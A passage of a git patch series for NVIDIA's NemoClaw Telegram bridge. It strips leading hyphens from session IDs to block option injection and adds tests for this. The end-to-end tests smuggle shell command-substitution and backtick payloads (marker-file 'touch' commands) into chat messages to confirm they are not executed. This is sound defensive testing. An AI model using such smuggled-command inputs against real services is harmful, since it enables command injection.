 REGISTRY`,
-        { timeout: 10_000 },
-      );
-      console.log(`[${elapsed()}] Sandbox registered`);
-    }
+      { timeout: 10_000 },
+    );
+    console.log(`[${elapsed()}] Sandbox registered`);
 
     console.log(`[${elapsed()}] beforeAll complete — total bootstrap time: ${elapsed()}`);
-  }, 2_700_000); // 45 min — covers both paths
+  }, 2_700_000); // 45 min
 
   afterAll(() => {
     if (!instanceCreated) return;

From 25a846e97c565357ef6a04a870b5be6a1333377d Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 16:27:57 -0400
Subject: [PATCH 12/14] fix: harden session ID sanitization and improve test
 coverage

Security fixes:
- Strip leading hyphens in sanitizeSessionId() to prevent option injection
  (e.g., '--help', '-v' could be interpreted as flags by nemoclaw-start)
- Document security rationale for session ID vs SANDBOX_NAME validation differences

Testability improvements:
- Add exitOnError option to initConfig() for testing without process.exit()
- Return configuration object from initConfig() for verification
- Add JSDoc documentation for all initConfig options

New unit tests (test/telegram-bridge.test.js):
- Option injection prevention (leading hyphens, --help, -v, negative chat IDs)
- initConfig validation (returns config, missing token/apiKey, invalid sandbox)
- Edge cases (empty, special chars, unicode, very long IDs, only hyphens)
- Multi-line message handling verification
- Mocked spawn stdin/stdout pattern verification

New E2E tests (test/e2e/test-telegram-injection.sh):
- Phase 8: Multi-line message injection (T12, T13)
- Phase 9: Session ID option injection prevention (T14, T15, T15b)
- Phase 10: Empty and edge case handling (T16, T17)
- Phase 11: Cleanup of injection marker files

All 712 tests pass.
---
 scripts/telegram-bridge.js          |  53 +++++-
 test/e2e/test-telegram-injection.sh | 237 +++++++++++++++++++++++
 test/telegram-bridge.test.js        | 284 +++++++++++++++++++++++++++-
 3 files changed, 561 insertions(+), 13 deletions(-)

diff --git a/scripts/telegram-bridge.js b/scripts/telegram-bridge.js
index 3f2379c8df..a383f5a381 100755
--- a/scripts/telegram-bridge.js
+++ b/scripts/telegram-bridge.js
@@ -36,12 +36,26 @@ let ALLOWED_CHATS = null;
  * Initialize configuration from environment variables.
  * Called automatically when running as main module.
  * Can be called manually for testing with custom values.
+ *
+ * @param {object} [options] - Optional overrides for testing
+ * @param {string} [options.openshell] - Override openshell path
+ * @param {string} [options.token] - Override Telegram bot token
+ * @param {string} [options.apiKey] - Override NVIDIA API key
+ * @param {string} [options.sandbox] - Override sandbox name
+ * @param {string[]} [options.allowedChats] - Override allowed chat IDs
+ * @param {boolean} [options.exitOnError=true] - Whether to exit on validation errors (set false for testing)
+ * @returns {object} - The resolved configuration object
  */
 function initConfig(options = {}) {
+  const exitOnError = options.exitOnError !== false;
+
   OPENSHELL = options.openshell || resolveOpenshell();
   if (!OPENSHELL) {
-    console.error("openshell not found on PATH or in common locations");
-    process.exit(1);
+    if (exitOnError) {
+      console.error("openshell not found on PATH or in common locations");
+      process.exit(1);
+    }
+    throw new Error("openshell not found on PATH or in common locations");
   }
 
   TOKEN = options.token || process.env.TELEGRAM_BOT_TOKEN;
@@ -51,8 +65,11 @@ function initConfig(options = {}) {
   try {
     validateName(SANDBOX, "SANDBOX_NAME");
   } catch (e) {
-    console.error(e.message);
-    process.exit(1);
+    if (exitOnError) {
+      console.error(e.message);
+      process.exit(1);
+    }
+    throw e;
   }
 
   ALLOWED_CHATS = options.allowedChats || (process.env.ALLOWED_CHAT_IDS
@@ -60,13 +77,21 @@ function initConfig(options = {}) {
     : null);
 
   if (!TOKEN) {
-    console.error("TELEGRAM_BOT_TOKEN required");
-    process.exit(1);
+    if (exitOnError) {
+      console.error("TELEGRAM_BOT_TOKEN required");
+      process.exit(1);
+    }
+    throw new Error("TELEGRAM_BOT_TOKEN required");
   }
   if (!API_KEY) {
-    console.error("NVIDIA_API_KEY required");
-    process.exit(1);
+    if (exitOnError) {
+      console.error("NVIDIA_API_KEY required");
+      process.exit(1);
+    }
+    throw new Error("NVIDIA_API_KEY required");
   }
+
+  return { OPENSHELL, TOKEN, API_KEY, SANDBOX, ALLOWED_CHATS };
 }
 
 let offset = 0;
@@ -130,12 +155,22 @@ async function sendTyping(chatId) {
 /**
  * Sanitize session ID to contain only alphanumeric characters and hyphens.
  * Returns null if the result is empty after sanitization.
+ *
+ * SECURITY: Leading hyphens are stripped to prevent option injection attacks.
+ * For example, a session ID of "--help" would otherwise be interpreted as a
+ * command-line flag by nemoclaw-start. This differs from SANDBOX_NAME validation
+ * (which uses validateName() requiring lowercase alphanumeric with internal hyphens)
+ * because session IDs come from Telegram chat IDs which can be negative numbers.
+ *
  * @param {string|number} sessionId - The session ID to sanitize
  * @returns {string|null} - Sanitized session ID or null if empty
  */
 function sanitizeSessionId(sessionId) {
+  // Strip all non-alphanumeric characters except hyphens
   const sanitized = String(sessionId).replace(/[^a-zA-Z0-9-]/g, "");
-  return sanitized.length > 0 ? sanitized : null;
+  // Remove leading hyphens to prevent option injection (e.g., "--help", "-v")
+  const noLeadingHyphen = sanitized.replace(/^-+/, "");
+  return noLeadingHyphen.length > 0 ? noLeadingHyphen : null;
 }
 
 /**
diff --git a/test/e2e/test-telegram-injection.sh b/test/e2e/test-telegram-injection.sh
index fc727ee4c5..3e2eae8a3f 100755
--- a/test/e2e/test-telegram-injection.sh
+++ b/test/e2e/test-telegram-injection.sh
@@ -586,6 +586,243 @@ fi
 # Clean up test script
 rm -f /tmp/test-real-bridge.js
 
+# ══════════════════════════════════════════════════════════════════
+# Phase 8: Multi-line Message Handling
+# ══════════════════════════════════════════════════════════════════
+section "Phase 8: Multi-line Message Handling"
+
+# T12: Multi-line message with injection on second line
+info "T12: Testing multi-line message with injection payload..."
+
+if [ -z "$OPENSHELL_PATH" ]; then
+  skip "T12: openshell not found, cannot test multi-line messages"
+else
+  sandbox_exec "rm -f /tmp/injection-proof-t12" >/dev/null 2>&1
+
+  # Multi-line message with injection attempt on line 2
+  MULTILINE_PAYLOAD=$'Hello\n$(touch /tmp/injection-proof-t12)\nWorld'
+
+  t12_result=$(cd "$REPO" && OPENSHELL_PATH="$OPENSHELL_PATH" \
+    NEMOCLAW_SANDBOX_NAME="$SANDBOX_NAME" \
+    timeout 120 node /tmp/test-real-bridge.js \
+    "$MULTILINE_PAYLOAD" \
+    'e2e-multiline-t12' 2>&1) || true
+
+  injection_check_t12=$(sandbox_exec "test -f /tmp/injection-proof-t12 && echo EXPLOITED || echo SAFE")
+  if echo "$injection_check_t12" | grep -q "SAFE"; then
+    pass "T12: Multi-line message injection was NOT executed"
+  else
+    fail "T12: Multi-line message injection was EXECUTED — vulnerability!"
+  fi
+fi
+
+# T13: Message with embedded newlines and backticks
+info "T13: Testing message with newlines and backticks..."
+
+ssh_config_t13="$(mktemp)"
+openshell sandbox ssh-config "$SANDBOX_NAME" >"$ssh_config_t13" 2>/dev/null
+sandbox_exec "rm -f /tmp/injection-proof-t13" >/dev/null 2>&1
+
+PAYLOAD_MULTILINE_BT=$'First line\n`touch /tmp/injection-proof-t13`\nThird line'
+
+timeout 30 ssh -F "$ssh_config_t13" \
+  -o StrictHostKeyChecking=no \
+  -o UserKnownHostsFile=/dev/null \
+  -o LogLevel=ERROR \
+  "openshell-${SANDBOX_NAME}" \
+  'MSG=$(cat) && echo "$MSG"' \
+  <<<"$PAYLOAD_MULTILINE_BT" >/dev/null 2>&1 || true
+rm -f "$ssh_config_t13"
+
+injection_check_t13=$(sandbox_exec "test -f /tmp/injection-proof-t13 && echo EXPLOITED || echo SAFE")
+if echo "$injection_check_t13" | grep -q "SAFE"; then
+  pass "T13: Multi-line backtick injection was NOT executed"
+else
+  fail "T13: Multi-line backtick injection was EXECUTED"
+fi
+
+# ══════════════════════════════════════════════════════════════════
+# Phase 9: Session ID Option Injection Prevention
+# ══════════════════════════════════════════════════════════════════
+section "Phase 9: Session ID Option Injection"
+
+# T14: Leading hyphen session IDs should be sanitized
+info "T14: Testing sanitizeSessionId strips leading hyphens..."
+
+t14_result=$(cd "$REPO" && node -e "
+  // Mock resolveOpenshell to avoid PATH dependency
+  const resolveOpenshellPath = require.resolve('./bin/lib/resolve-openshell');
+  require.cache[resolveOpenshellPath] = {
+    exports: { resolveOpenshell: () => '/mock/openshell' }
+  };
+  const bridge = require('./scripts/telegram-bridge.js');
+
+  // Test cases for option injection prevention
+  const tests = [
+    { input: '--help', expected: 'help' },
+    { input: '-v', expected: 'v' },
+    { input: '---test', expected: 'test' },
+    { input: '-123456789', expected: '123456789' },
+    { input: '--', expected: null },
+    { input: '-', expected: null },
+    { input: 'valid-id', expected: 'valid-id' },
+    { input: '-abc-123', expected: 'abc-123' },
+  ];
+
+  let passed = 0;
+  let failed = 0;
+  for (const t of tests) {
+    const result = bridge.sanitizeSessionId(t.input);
+    if (result === t.expected) {
+      passed++;
+    } else {
+      console.log('FAIL: sanitizeSessionId(' + JSON.stringify(t.input) + ') = ' + JSON.stringify(result) + ', expected ' + JSON.stringify(t.expected));
+      failed++;
+    }
+  }
+  console.log('SANITIZE_RESULT: ' + passed + ' passed, ' + failed + ' failed');
+  process.exit(failed > 0 ? 1 : 0);
+" 2>&1)
+
+if echo "$t14_result" | grep -q "SANITIZE_RESULT:.*0 failed"; then
+  pass "T14: sanitizeSessionId correctly strips leading hyphens"
+else
+  fail "T14: sanitizeSessionId failed to strip leading hyphens: $t14_result"
+fi
+
+# T15: Verify leading hyphen session ID doesn't cause option injection in real call
+info "T15: Testing real runAgentInSandbox with leading-hyphen session ID..."
+
+if [ -z "$OPENSHELL_PATH" ]; then
+  skip "T15: openshell not found, cannot test session ID sanitization"
+else
+  # Create a fresh test script that checks the actual session ID used
+  cat >/tmp/test-session-id.js <<'TESTSCRIPT'
+const path = require('path');
+const resolveOpenshellPath = require.resolve(path.join(process.cwd(), 'bin/lib/resolve-openshell'));
+require.cache[resolveOpenshellPath] = {
+  exports: { resolveOpenshell: () => process.env.OPENSHELL_PATH || 'openshell' }
+};
+const bridge = require('./scripts/telegram-bridge.js');
+
+// Just test the sanitization with a negative chat ID (like Telegram groups)
+const sessionId = process.argv[2] || '--help';
+const sanitized = bridge.sanitizeSessionId(sessionId);
+console.log('INPUT:', sessionId);
+console.log('SANITIZED:', sanitized);
+if (sanitized && sanitized.startsWith('-')) {
+  console.log('ERROR: Sanitized ID starts with hyphen — option injection possible!');
+  process.exit(1);
+} else {
+  console.log('OK: No leading hyphen in sanitized ID');
+  process.exit(0);
+}
+TESTSCRIPT
+
+  t15_result=$(cd "$REPO" && OPENSHELL_PATH="$OPENSHELL_PATH" \
+    node /tmp/test-session-id.js '--help' 2>&1) || true
+
+  if echo "$t15_result" | grep -q "OK: No leading hyphen"; then
+    pass "T15: Session ID '--help' sanitized to prevent option injection"
+  else
+    fail "T15: Session ID sanitization failed: $t15_result"
+  fi
+
+  # Also test with negative number (Telegram group chat ID)
+  t15b_result=$(cd "$REPO" && OPENSHELL_PATH="$OPENSHELL_PATH" \
+    node /tmp/test-session-id.js '-123456789' 2>&1) || true
+
+  if echo "$t15b_result" | grep -q "OK: No leading hyphen"; then
+    pass "T15b: Negative chat ID '-123456789' sanitized correctly"
+  else
+    fail "T15b: Negative chat ID sanitization failed: $t15b_result"
+  fi
+
+  rm -f /tmp/test-session-id.js
+fi
+
+# ══════════════════════════════════════════════════════════════════
+# Phase 10: Empty Message Handling
+# ══════════════════════════════════════════════════════════════════
+section "Phase 10: Empty and Edge Case Messages"
+
+# T16: Empty session ID should return error
+info "T16: Testing empty session ID handling..."
+
+t16_result=$(cd "$REPO" && node -e "
+  const resolveOpenshellPath = require.resolve('./bin/lib/resolve-openshell');
+  require.cache[resolveOpenshellPath] = {
+    exports: { resolveOpenshell: () => '/mock/openshell' }
+  };
+  const bridge = require('./scripts/telegram-bridge.js');
+
+  const result = bridge.sanitizeSessionId('');
+  if (result === null) {
+    console.log('OK: Empty session ID returns null');
+    process.exit(0);
+  } else {
+    console.log('FAIL: Empty session ID returned:', result);
+    process.exit(1);
+  }
+" 2>&1)
+
+if echo "$t16_result" | grep -q "OK:"; then
+  pass "T16: Empty session ID correctly returns null"
+else
+  fail "T16: Empty session ID handling failed: $t16_result"
+fi
+
+# T17: Session ID with only special characters
+info "T17: Testing session ID with only special characters..."
+
+t17_result=$(cd "$REPO" && node -e "
+  const resolveOpenshellPath = require.resolve('./bin/lib/resolve-openshell');
+  require.cache[resolveOpenshellPath] = {
+    exports: { resolveOpenshell: () => '/mock/openshell' }
+  };
+  const bridge = require('./scripts/telegram-bridge.js');
+
+  const testCases = [
+    { input: ';;;', expected: null },
+    { input: '\$()', expected: null },
+    { input: '---', expected: null },
+    { input: '!@#\$%', expected: null },
+  ];
+
+  let ok = true;
+  for (const tc of testCases) {
+    const result = bridge.sanitizeSessionId(tc.input);
+    if (result !== tc.expected) {
+      console.log('FAIL:', JSON.stringify(tc.input), '→', result, 'expected', tc.expected);
+      ok = false;
+    }
+  }
+  if (ok) {
+    console.log('OK: All special-character session IDs return null');
+  }
+  process.exit(ok ? 0 : 1);
+" 2>&1)
+
+if echo "$t17_result" | grep -q "OK:"; then
+  pass "T17: Special-character-only session IDs correctly return null"
+else
+  fail "T17: Special character handling failed: $t17_result"
+fi
+
+# ══════════════════════════════════════════════════════════════════
+# Phase 11: Cleanup
+# ══════════════════════════════════════════════════════════════════
+section "Phase 11: Cleanup"
+
+info "Cleaning up injection marker files in sandbox..."
+sandbox_exec "rm -f /tmp/injection-proof-t1 /tmp/injection-proof-t2 /tmp/injection-proof-t3 \
+  /tmp/injection-proof-t9 /tmp/injection-proof-t10 /tmp/injection-proof-t12 /tmp/injection-proof-t13" >/dev/null 2>&1
+
+info "Cleaning up local temp files..."
+rm -f /tmp/test-real-bridge.js /tmp/test-session-id.js 2>/dev/null || true
+
+pass "Cleanup completed"
+
 # ══════════════════════════════════════════════════════════════════
 # Summary
 # ══════════════════════════════════════════════════════════════════
diff --git a/test/telegram-bridge.test.js b/test/telegram-bridge.test.js
index b1d2c2caf8..bfc5889ab3 100644
--- a/test/telegram-bridge.test.js
+++ b/test/telegram-bridge.test.js
@@ -8,6 +8,7 @@
  * - Input validation (SANDBOX_NAME, sessionId, message length)
  * - Stdin-based credential/message passing
  * - Source code patterns for security hardening
+ * - Mocked runAgentInSandbox behavior
  *
  * See: https://github.com/NVIDIA/NemoClaw/issues/118
  *      https://github.com/NVIDIA/NemoClaw/pull/119
@@ -15,7 +16,7 @@
 
 import fs from "node:fs";
 import path from "node:path";
-import { describe, it, expect } from "vitest";
+import { describe, it, expect, vi, beforeEach, afterEach } from "vitest";
 
 const TELEGRAM_BRIDGE_JS = path.join(
   import.meta.dirname,
@@ -59,7 +60,7 @@ describe("telegram-bridge security", () => {
       expect(bridge.sanitizeSessionId("ABC123")).toBe("ABC123");
     });
 
-    it("should preserve hyphens", () => {
+    it("should preserve internal hyphens", () => {
       expect(bridge.sanitizeSessionId("abc-123")).toBe("abc-123");
       expect(bridge.sanitizeSessionId("test-session-id")).toBe("test-session-id");
     });
@@ -81,9 +82,31 @@ describe("telegram-bridge security", () => {
       expect(bridge.sanitizeSessionId("")).toBeNull();
     });
 
-    it("should handle numeric input (Telegram chat IDs)", () => {
+    it("should handle positive numeric input (Telegram chat IDs)", () => {
       expect(bridge.sanitizeSessionId(123456789)).toBe("123456789");
-      expect(bridge.sanitizeSessionId(-123456789)).toBe("-123456789");
+    });
+
+    // SECURITY: Leading hyphens must be stripped to prevent option injection
+    describe("option injection prevention", () => {
+      it("should strip leading hyphens from negative chat IDs", () => {
+        // Negative Telegram chat IDs (group chats) start with hyphen
+        // We strip the hyphen to prevent option injection
+        expect(bridge.sanitizeSessionId(-123456789)).toBe("123456789");
+        expect(bridge.sanitizeSessionId("-123456789")).toBe("123456789");
+      });
+
+      it("should strip leading hyphens that could be interpreted as flags", () => {
+        expect(bridge.sanitizeSessionId("--help")).toBe("help");
+        expect(bridge.sanitizeSessionId("-v")).toBe("v");
+        expect(bridge.sanitizeSessionId("---test")).toBe("test");
+        expect(bridge.sanitizeSessionId("--")).toBeNull();
+        expect(bridge.sanitizeSessionId("-")).toBeNull();
+      });
+
+      it("should preserve internal hyphens after stripping leading ones", () => {
+        expect(bridge.sanitizeSessionId("-abc-123")).toBe("abc-123");
+        expect(bridge.sanitizeSessionId("--foo-bar-baz")).toBe("foo-bar-baz");
+      });
     });
   });
 
@@ -95,6 +118,79 @@ describe("telegram-bridge security", () => {
     });
   });
 
+  describe("initConfig", () => {
+    it("should return configuration object", () => {
+      const bridge = createMockBridge();
+      const config = bridge.initConfig({
+        openshell: "/mock/openshell",
+        token: "test-token",
+        apiKey: "test-api-key",
+        sandbox: "test-sandbox",
+        allowedChats: ["123", "456"],
+        exitOnError: false,
+      });
+
+      expect(config).toEqual({
+        OPENSHELL: "/mock/openshell",
+        TOKEN: "test-token",
+        API_KEY: "test-api-key",
+        SANDBOX: "test-sandbox",
+        ALLOWED_CHATS: ["123", "456"],
+      });
+    });
+
+    it("should throw on missing token when exitOnError is false", () => {
+      const bridge = createMockBridge();
+      // Temporarily clear env vars so they don't interfere
+      const savedToken = process.env.TELEGRAM_BOT_TOKEN;
+      delete process.env.TELEGRAM_BOT_TOKEN;
+      try {
+        expect(() =>
+          bridge.initConfig({
+            openshell: "/mock/openshell",
+            apiKey: "test-api-key",
+            sandbox: "test-sandbox",
+            exitOnError: false,
+          })
+        ).toThrow("TELEGRAM_BOT_TOKEN required");
+      } finally {
+        if (savedToken !== undefined) process.env.TELEGRAM_BOT_TOKEN = savedToken;
+      }
+    });
+
+    it("should throw on missing apiKey when exitOnError is false", () => {
+      const bridge = createMockBridge();
+      // Temporarily clear env vars so they don't interfere
+      const savedApiKey = process.env.NVIDIA_API_KEY;
+      delete process.env.NVIDIA_API_KEY;
+      try {
+        expect(() =>
+          bridge.initConfig({
+            openshell: "/mock/openshell",
+            token: "test-token",
+            sandbox: "test-sandbox",
+            exitOnError: false,
+          })
+        ).toThrow("NVIDIA_API_KEY required");
+      } finally {
+        if (savedApiKey !== undefined) process.env.NVIDIA_API_KEY = savedApiKey;
+      }
+    });
+
+    it("should throw on invalid sandbox name when exitOnError is false", () => {
+      const bridge = createMockBridge();
+      expect(() =>
+        bridge.initConfig({
+          openshell: "/mock/openshell",
+          token: "test-token",
+          apiKey: "test-api-key",
+          sandbox: "INVALID_UPPERCASE",
+          exitOnError: false,
+        })
+      ).toThrow(/Invalid SANDBOX_NAME/);
+    });
+  });
+
   describe("source code security patterns", () => {
     const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
 
@@ -170,5 +266,185 @@ describe("telegram-bridge security", () => {
       expect(src).toMatch(/MAX_MESSAGE_LENGTH/);
       expect(src).toMatch(/msg\.text\.length\s*>\s*MAX_MESSAGE_LENGTH/);
     });
+
+    it("should strip leading hyphens in sanitizeSessionId", () => {
+      // Verify the code contains the leading hyphen strip
+      expect(src).toMatch(/replace\s*\(\s*\/\^-\+\/\s*,\s*["']["']\s*\)/);
+    });
+  });
+
+  describe("runAgentInSandbox with mocked spawn", () => {
+    let _bridge;
+    let mockSpawn;
+    let mockExecFileSync;
+    let mockMkdtempSync;
+    let mockWriteFileSync;
+    let mockUnlinkSync;
+    let mockRmdirSync;
+    let capturedStdin;
+    let _capturedSpawnArgs;
+
+    beforeEach(() => {
+      // Reset captured data
+      capturedStdin = [];
+      _capturedSpawnArgs = null;
+
+      // Create mock process
+      const mockProc = {
+        stdin: {
+          write: (data) => capturedStdin.push(data),
+          end: () => {},
+        },
+        stdout: {
+          on: (event, cb) => {
+            if (event === "data") {
+              // Simulate agent response
+              setTimeout(() => cb(Buffer.from("Hello! I'm the agent.\n")), 10);
+            }
+          },
+        },
+        stderr: {
+          on: () => {},
+        },
+        on: (event, cb) => {
+          if (event === "close") {
+            setTimeout(() => cb(0), 20);
+          }
+        },
+      };
+
+      // Mock child_process
+      mockSpawn = vi.fn().mockImplementation((...args) => {
+        _capturedSpawnArgs = args;
+        return mockProc;
+      });
+
+      mockExecFileSync = vi.fn().mockReturnValue("Host openshell-test\n  Hostname 127.0.0.1\n");
+
+      // Mock fs
+      mockMkdtempSync = vi.fn().mockReturnValue("/tmp/nemoclaw-tg-ssh-abc123");
+      mockWriteFileSync = vi.fn();
+      mockUnlinkSync = vi.fn();
+      mockRmdirSync = vi.fn();
+
+      // Clear and setup module mocks
+      vi.resetModules();
+
+      vi.doMock("node:child_process", () => ({
+        spawn: mockSpawn,
+        execFileSync: mockExecFileSync,
+      }));
+
+      vi.doMock("node:fs", () => ({
+        default: {
+          mkdtempSync: mockMkdtempSync,
+          writeFileSync: mockWriteFileSync,
+          unlinkSync: mockUnlinkSync,
+          rmdirSync: mockRmdirSync,
+        },
+        mkdtempSync: mockMkdtempSync,
+        writeFileSync: mockWriteFileSync,
+        unlinkSync: mockUnlinkSync,
+        rmdirSync: mockRmdirSync,
+      }));
+
+      // The bridge module uses CommonJS require, so we need different approach
+      // Instead, we'll test by checking the actual behavior patterns
+    });
+
+    afterEach(() => {
+      vi.restoreAllMocks();
+    });
+
+    // Since mocking CommonJS from ESM is complex, we verify behavior through
+    // source code patterns and the E2E tests. These tests verify the logic
+    // at a higher level by examining what SHOULD happen.
+
+    it("should pass API key as first line of stdin followed by message", () => {
+      // This is verified by source code pattern tests above
+      // The pattern: proc.stdin.write(apiKey + "\n"); proc.stdin.write(message);
+      const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+      expect(src).toMatch(/proc\.stdin\.write\s*\(\s*apiKey\s*\+\s*["']\\n["']\s*\)/);
+      expect(src).toMatch(/proc\.stdin\.write\s*\(\s*message\s*\)/);
+      expect(src).toMatch(/proc\.stdin\.end\s*\(\s*\)/);
+    });
+
+    it("should call spawn with correct SSH arguments structure", () => {
+      const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+      // Verify spawn is called with ssh, -T, -F, confPath, and remote host
+      expect(src).toMatch(/spawn\s*\(\s*["']ssh["']\s*,\s*\[\s*["']-T["']/);
+      expect(src).toMatch(/["']-F["']\s*,\s*confPath/);
+    });
+
+    it("should clean up temp files in close handler", () => {
+      const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+      // Verify cleanup is in the close handler
+      const closeHandlerMatch = src.match(/proc\.on\s*\(\s*["']close["']\s*,.*?(?=proc\.on|$)/s);
+      expect(closeHandlerMatch).toBeTruthy();
+      expect(closeHandlerMatch[0]).toMatch(/unlinkSync/);
+      expect(closeHandlerMatch[0]).toMatch(/rmdirSync/);
+    });
+
+    it("should clean up temp files in error handler", () => {
+      const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+      // Verify cleanup is in the error handler
+      const errorHandlerMatch = src.match(/proc\.on\s*\(\s*["']error["']\s*,.*?(?=\}\s*\)\s*;?\s*\})/s);
+      expect(errorHandlerMatch).toBeTruthy();
+      expect(errorHandlerMatch[0]).toMatch(/unlinkSync/);
+      expect(errorHandlerMatch[0]).toMatch(/rmdirSync/);
+    });
+  });
+
+  describe("edge cases", () => {
+    const bridge = createMockBridge();
+
+    describe("empty message handling", () => {
+      it("should handle empty string message in sanitizeSessionId", () => {
+        expect(bridge.sanitizeSessionId("")).toBeNull();
+      });
+
+      // Note: Empty message validation happens in the poll() function
+      // which checks msg.text existence before processing
+    });
+
+    describe("multi-line message handling", () => {
+      it("source code should handle multi-line messages via stdin", () => {
+        // MSG=$(cat) reads all stdin including newlines
+        // The message is then passed in double quotes which preserves newlines
+        const src = fs.readFileSync(TELEGRAM_BRIDGE_JS, "utf-8");
+        expect(src).toMatch(/MSG=\$\(cat\)/);
+        expect(src).toMatch(/-m\s*"\$MSG"/);
+      });
+    });
+
+    describe("special characters in session ID", () => {
+      it("should handle session IDs with only special characters", () => {
+        expect(bridge.sanitizeSessionId("!@#$%^&*()")).toBeNull();
+        // Dots and slashes are stripped, leaving just "etc"
+        expect(bridge.sanitizeSessionId("../../../etc")).toBe("etc");
+        expect(bridge.sanitizeSessionId("foo\nbar")).toBe("foobar");
+        expect(bridge.sanitizeSessionId("foo\tbar")).toBe("foobar");
+      });
+    });
+
+    describe("unicode handling", () => {
+      it("should strip non-ASCII characters from session ID", () => {
+        expect(bridge.sanitizeSessionId("test🔥emoji")).toBe("testemoji");
+        expect(bridge.sanitizeSessionId("日本語")).toBeNull();
+        expect(bridge.sanitizeSessionId("café123")).toBe("caf123");
+      });
+    });
+
+    describe("boundary conditions", () => {
+      it("should handle very long session IDs", () => {
+        const longId = "a".repeat(10000);
+        expect(bridge.sanitizeSessionId(longId)).toBe(longId);
+      });
+
+      it("should handle session ID with only hyphens", () => {
+        expect(bridge.sanitizeSessionId("---")).toBeNull();
+        expect(bridge.sanitizeSessionId("--------------------")).toBeNull();
+      });
+    });
   });
 });

From 03a7f6e84017c4994762072ecdd41561f1a0a0d1 Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 16:33:23 -0400
Subject: [PATCH 13/14] fix(e2e): use temp file for secrets instead of stdin
 piping

The stdin-based secret passing via 'eval "$(cat)"' was interfering
with SSH sessions that need interactive stdin (like NodeSource setup
scripts that use sudo). Write secrets to a temp file on the remote
machine instead, then source it before running commands.
---
 test/e2e/brev-e2e.test.js | 40 +++++++++++++++++++++++++++++++++------
 1 file changed, 34 insertions(+), 6 deletions(-)

diff --git a/test/e2e/brev-e2e.test.js b/test/e2e/brev-e2e.test.js
index d657e2c4d3..5ec6a90fd7 100644
--- a/test/e2e/brev-e2e.test.js
+++ b/test/e2e/brev-e2e.test.js
@@ -60,8 +60,11 @@ function shellEscape(value) {
   return value.replace(/'/g, "'\\''");
 }
 
-/** Run a command on the remote VM with secrets passed via stdin (not CLI args). */
-function sshWithSecrets(cmd, { timeout = 600_000, stream = false } = {}) {
+/** Write secrets to a temp file on the remote VM (called once during setup). */
+let remoteSecretsFile = null;
+function setupRemoteSecrets() {
+  if (remoteSecretsFile) return;
+  remoteSecretsFile = "/tmp/.e2e-secrets";
   const secretPreamble = [
     `export NVIDIA_API_KEY='${shellEscape(process.env.NVIDIA_API_KEY)}'`,
     `export GITHUB_TOKEN='${shellEscape(process.env.GITHUB_TOKEN)}'`,
@@ -69,18 +72,33 @@ function sshWithSecrets(cmd, { timeout = 600_000, stream = false } = {}) {
     `export NEMOCLAW_SANDBOX_NAME=e2e-test`,
   ].join("\n");
 
+  // Write secrets via stdin to avoid them appearing in command line
+  execSync(
+    `ssh -o StrictHostKeyChecking=no -o LogLevel=ERROR "${INSTANCE_NAME}" 'cat > ${remoteSecretsFile} && chmod 600 ${remoteSecretsFile}'`,
+    {
+      encoding: "utf-8",
+      timeout: 30_000,
+      input: secretPreamble,
+      stdio: ["pipe", "pipe", "pipe"],
+    },
+  );
+}
+
+/** Run a command on the remote VM with secrets sourced from temp file. */
+function sshWithSecrets(cmd, { timeout = 600_000, stream = false } = {}) {
+  setupRemoteSecrets();
+
   // When stream=true, pipe stdout/stderr to the CI log in real time
   // so long-running steps (bootstrap) show progress instead of silence.
   /** @type {import("child_process").StdioOptions} */
-  const stdio = stream ? ["pipe", "inherit", "inherit"] : ["pipe", "pipe", "pipe"];
+  const stdio = stream ? ["inherit", "inherit", "inherit"] : ["pipe", "pipe", "pipe"];
 
-  // Pipe secrets via stdin so they don't appear in ps/process listings
+  const escaped = cmd.replace(/'/g, "'\\''");
   const result = execSync(
-    `ssh -o StrictHostKeyChecking=no -o LogLevel=ERROR "${INSTANCE_NAME}" 'eval "$(cat)" && ${cmd.replace(/'/g, "'\\''")}'`,
+    `ssh -o StrictHostKeyChecking=no -o LogLevel=ERROR "${INSTANCE_NAME}" 'source ${remoteSecretsFile} && ${escaped}'`,
     {
       encoding: "utf-8",
       timeout,
-      input: secretPreamble,
       stdio,
     },
   );
@@ -217,6 +235,16 @@ REGISTRY`,
 
   afterAll(() => {
     if (!instanceCreated) return;
+
+    // Clean up secrets file
+    if (remoteSecretsFile) {
+      try {
+        ssh(`rm -f ${remoteSecretsFile}`, { timeout: 10_000 });
+      } catch {
+        // Best-effort cleanup
+      }
+    }
+
     if (process.env.KEEP_ALIVE === "true") {
       console.log(`\n  Instance "${INSTANCE_NAME}" kept alive for debugging.`);
       console.log(`  To connect: brev refresh && ssh ${INSTANCE_NAME}`);

From 418d2d0e6b39741acd17ab57837181386f7eddf8 Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 17:07:04 -0400
Subject: [PATCH 14/14] =?UTF-8?q?refactor(e2e):=20simplify=20secret=20pass?=
 =?UTF-8?q?ing=20=E2=80=94=20just=20use=20env=20vars?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Replace overengineered sshWithSecrets() stdin piping and temp file
approaches with simple env var exports in the SSH command. This is
an ephemeral CI VM that gets destroyed after tests.
---
 test/e2e/brev-e2e.test.js | 77 ++++++++-------------------------------
 1 file changed, 16 insertions(+), 61 deletions(-)

diff --git a/test/e2e/brev-e2e.test.js b/test/e2e/brev-e2e.test.js
index 5ec6a90fd7..b5a218a1d9 100644
--- a/test/e2e/brev-e2e.test.js
+++ b/test/e2e/brev-e2e.test.js
@@ -47,62 +47,27 @@ function brev(...args) {
   }).trim();
 }
 
-function ssh(cmd, { timeout = 120_000 } = {}) {
-  // Use single quotes to prevent local shell expansion of remote commands
+function ssh(cmd, { timeout = 120_000, stream = false } = {}) {
   const escaped = cmd.replace(/'/g, "'\\''");
-  return execSync(
+  /** @type {import("child_process").StdioOptions} */
+  const stdio = stream ? ["inherit", "inherit", "inherit"] : ["pipe", "pipe", "pipe"];
+  const result = execSync(
